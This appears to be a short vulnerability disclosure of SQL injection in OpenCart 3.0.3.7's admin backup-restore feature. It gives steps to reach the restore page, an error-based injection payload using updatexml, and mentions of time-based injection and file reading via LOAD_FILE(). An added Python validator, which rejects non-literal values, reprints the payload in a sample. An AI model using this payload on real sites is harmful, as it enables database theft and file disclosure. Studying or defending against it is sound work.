SQL injection in the admin backend of OpenCart

Extrader
Jul 30, 2021

Affected version: 3.0.3.7 (or < 3.0.3.7?)

Suppose I have obtained admin rights to the website backend.

Admin panel -> System -> Maintenance -> Backup/Restore -> Restore

Import a file, capture the request, and modify the file content.

Payload: INSERT INTO `opencart`.`oc_api_ip` (`api_ip_id`, `api_id`, `ip`) VALUES (5, 5, '123' or updatexml(1,concat(0x7e,(version())),0) or'');\n

If no error information is returned, time-based SQL injection can be used to achieve the same effect.

Through this vulnerability, we can obtain information from the database or read files on the computer through LOAD_FILE().
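A defensive check for the restore path described above, as an added example that is not part of the original post or of OpenCart's code: it refuses any uploaded backup line whose VALUES list contains anything other than plain literals, which is where the quoted statement hides its function call. The one-statement-per-line format, the function names and the table allow-list are assumptions made for this sketch.

```python
import re

# Assumed backup format (not from the page): one statement per line, either
# TRUNCATE TABLE `t`; or INSERT INTO `t` (cols) VALUES (literal rows);
STATEMENT = re.compile(
    r"^(?:TRUNCATE\s+TABLE\s+(?:`\w+`\.)?`(?P<trunc>\w+)`"
    r"|INSERT\s+INTO\s+(?:`\w+`\.)?`(?P<table>\w+)`\s*\([^)]*\)"
    r"\s*VALUES\s*(?P<rows>.+))\s*;$", re.IGNORECASE)
# One token of a VALUES list: quoted string, number, NULL or punctuation.
TOKEN = re.compile(r"""\s*(?:(?P<str>'(?:[^'\\]|\\.|'')*')
    |(?P<num>-?\d+(?:\.\d+)?) |(?P<null>NULL\b) |(?P<punct>[(),]))""",
    re.VERBOSE | re.IGNORECASE)
# Grammar of "(v, v), (v, v)": state -> {token: next state}
NEXT = {"row": {"(": "value"},
        "value": {"str": "sep", "num": "sep", "null": "sep"},
        "sep": {",": "value", ")": "done"},
        "done": {",": "row"}}

def values_are_literals(rows):
    """True only if every value is a plain literal (no operators or calls)."""
    state, pos, rows = "row", 0, rows.strip()
    while pos < len(rows):
        m = TOKEN.match(rows, pos)
        state = NEXT[state].get(m.group("punct") or m.lastgroup) if m else None
        if state is None:
            return False
        pos = m.end()
    return state == "done"

def audit_backup(sql_text, allowed_tables):
    """Return (line_no, reason) for each line the restore must refuse."""
    findings = []
    for no, line in enumerate(sql_text.splitlines(), 1):
        if not line.strip():
            continue
        m = STATEMENT.match(line.strip())
        if m is None:
            findings.append((no, "statement type not allowed"))
        elif (m.group("trunc") or m.group("table")) not in allowed_tables:
            findings.append((no, "table not in allow-list"))
        elif m.group("rows") and not values_are_literals(m.group("rows")):
            findings.append((no, "non-literal expression in VALUES"))
    return findings

# Constructed sample; line 3 is the statement quoted in the post.
SAMPLE = """TRUNCATE TABLE `oc_api_ip`;
INSERT INTO `oc_api_ip` (`api_ip_id`, `api_id`, `ip`) VALUES (1, 1, '203.0.113.7');
INSERT INTO `opencart`.`oc_api_ip` (`api_ip_id`, `api_id`, `ip`) VALUES (5, 5, '123' or updatexml(1,concat(0x7e,(version())),0) or '');
INSERT INTO `oc_user` (`user_id`) VALUES (9);"""
```

Calling audit_backup(SAMPLE, {"oc_api_ip"}) reports lines 3 and 4; a restore handler would abort the whole import on any finding rather than skip the flagged lines.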

The vulnerability code is as follows
